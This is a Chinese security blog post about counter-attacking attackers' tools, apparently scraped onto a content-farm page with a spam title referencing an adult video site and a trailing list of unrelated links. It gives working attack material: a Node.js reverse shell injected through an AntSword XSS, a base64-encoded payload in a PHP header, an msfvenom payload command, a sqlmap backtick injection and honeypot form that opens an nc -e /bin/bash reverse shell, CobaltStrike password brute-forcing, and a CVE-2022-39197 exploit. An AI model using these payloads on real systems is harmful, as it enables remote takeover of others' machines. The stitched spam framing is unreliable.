当前位置: 首页 > news >正文

成年做羞羞的视频网站space学软件工程有前途吗

成年做羞羞的视频网站space,学软件工程有前途吗,网站外链,江宁网站建设多少钱目录 案例一#xff1a;溯源反制-Webshell工具-Antsword 案例二#xff1a;溯源反制-SQL注入工具-SQLMAP 案例三#xff1a;溯源反制-漏洞扫描工具-Goby 案例四#xff1a;溯源反制-远程控制工具-CobaltStrike 反制Server#xff0c;爆破密码#xff08;通用#x…目录 案例一溯源反制-Webshell工具-Antsword 案例二溯源反制-SQL注入工具-SQLMAP 案例三溯源反制-漏洞扫描工具-Goby 案例四溯源反制-远程控制工具-CobaltStrike 反制Server爆破密码通用 CVE-2022-39197 案例一溯源反制-Webshell工具-Antsword 参考文章溯源七之利用AntSword RCE进行溯源反制黑客 - 私ははいしゃ敗者です - 博客园 有版本限制这里我时蚁剑v2.0.7 攻击段上传php一句话木马建立连接 防守方目录中已经上传 把对方的上传的文件改成下面的 ?php header(HTTP/1.1 500 img src# οnerrοralert(1));? 蚁剑再次连接的时候会弹出1 可以看出来蚁剑可以执行javascript代码因为不在浏览器上所以应该可以执行node.js代码 Node.js是一个基于Google Chrome V8 JavaScript引擎的开源JavaScript运行时环境。它使得JavaScript能够在服务器端运行 node.js通过socket反弹shell var net require(net), sh require(child_process).exec(cmd.exe); var client new net.Socket(); client.connect(1111, 192.168.232.131, function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});把ip修改为自己的ip和端口并进行base64编码 利用xss漏洞触发执行把编码进行拼接 ?phpheader(HTTP/1.1 500 Not \img src# onerroreval(new Buffer(dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCJjbWQuZXhlIik7CnZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOwpjbGllbnQuY29ubmVjdCgxMTExLCAiMTkyLjE2OC4yMzIuMTMxIiwgZnVuY3Rpb24oKXtjbGllbnQucGlwZShzaC5zdGRpbik7c2guc3Rkb3V0LnBpcGUoY2xpZW50KTtzaC5zdGRlcnIucGlwZShjbGllbnQpO30pOw,base64).toString()));?防守方修改 这里我新开了一台kali进行监听 当攻击者再次访问的时候反弹shell 利用msf生成node.js木马后续步骤与之前一致 msfvenom -p nodejs/shell_reverse_tcp LHOST192.168.0.105 LPORT10086 -f raw -o payload.js 案例二溯源反制-SQL注入工具-SQLMAP linux系统在运行命令时,在后面有参数的时候会先去看参数是什么然后再执行当加上 {命令}   的时候命令就会被执行 根据这个特性在sqlmap执行命令加上参数 sqlmap -u http://192.168.232.128/1.php?idaaabls 利用nc反弹shell sqlmap -u http://192.168.232.128/1.php?idaaabnc -e /bin/bash 192.168.232.128 2222 创建钓鱼页面把echo后面的代码变成反弹自己页面的base64代码 html headmeta charsetutf-8 title A sqlmap honeypot demo/title /head bodyinputsearch the user/input !--创建一个空白表单--form actionusername.html methodpost enctypetext/plain!--创建一个隐藏的表单--input typehidden namename valueVertiFyid45273434queryshellecho bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjIzMi4xMjggMjIyMg | base64 -d|bash -iport6379/ !--创建一个按钮提交表单内容--input typesubmit value提交/form /body /html 利用漏洞扫描工具扫描的时候就会扫描到post类型的sql注入最好配合正式系统留个陷阱 访问然后抓包发现为post 利用sqlmap进行注入的时候 成功反制 但是问题就是感觉有经验的一眼就能看出来就能骗骗菜鸟而且还需要优化不能让他卡在那里 案例三溯源反制-漏洞扫描工具-Goby 参考文章蓝队反制之--Goby反制 - 小阿辉谈安全 - 博客园 扫描完发现能扫描出来但是复现不出来 案例四溯源反制-远程控制工具-CobaltStrike 反制Server爆破密码通用 项目地址 https://github.com/ryanohoro/csbruter 命令这里默认他是50050端口一般需要去爆破出来cs开放端口是多少并且确定了cs地址如果他没有做过c2 python3 csbruter.py [-h] [-p PORT] [-t THREADS] host [wordlist]python csbruter.py 192.168.232.131 pass.txt 能否爆破出来取决于密码字典 可以直接根据目标ip以及密码连接到对方的cs获取对方的成功 CVE-2022-39197 cs 4.7 项目地址GitHub - its-arun/CVE-2022-39197: CobaltStrike 4.7.1 RCE 配置项目 生成完成以后 复制到serve目录下 在该目录下搭建简易网站 需要修改文件 执行命令 python cve-2022-39197.py beacon.exe http://python简易网站:8000/evil.svg同时cs会上线 如果在这个中间看了进程会触发rce会弹出计算器 可惜没复现成功后续就是把计算机命令改成反弹shell的命令
http://www.hkea.cn/news/14356020/

相关文章:

  • 网站模板 家为何上不了建设银行网站
  • 温州微网站制作哪里有怎么做死循环网站
  • 北京最大网站建设公司排名淘宝联盟的购物网站怎么做
  • 公司网站宣传设计方案商洛市建设工程造价管理站网站
  • 网站右下角调用优酷视频广告代码浏览器正能量网站免费软件
  • 做网站首页文件程序员给女朋友做的网站
  • 在线网站建设价值wordpress oss upload
  • 如何查询网站域名二级建造师报考条件官网
  • wordpress页面自定义页面杭州网站关键词优化
  • html做的网页怎么变成网站保定网站推广多少钱
  • 网站建设培训简报河南新闻
  • 个人网站模板的优缺点wordpress图片体积
  • 合肥建站企业seo优化一般包括哪些内容
  • 购物网站开题报告wordpress自定义DIV样式
  • 厦门网站优化建设公司建网站多少钱qcjxkd
  • pc端网站自适应代码学做网站会员
  • 湖北平台网站建设制作开公司怎么注册
  • php企业网站源码蓝色正规网站建设商家
  • 网站建设使用的基本技术一个公网ip可以做几个网站
  • 腾讯云做网站步骤做包装的网站
  • 国外英文网站百度账户托管
  • 网络小白如何建立个人网站网络推广平台加盟
  • 湖北网站建站系统哪家好高清图片免费下载
  • jsp网站空间合肥新闻 今天 最新消息
  • 欧卡乐网站建设快速网站仿制
  • 教程网站后台密码白头鹰网站一天可以做多少任务
  • 河南金建建设有限公司网站制作营销网页
  • 公司网站建设关键字描述做的网站提示不安全
  • 个人做房产网站word网站的链接怎么做的
  • mixkitcom素材网站金融培训网站源码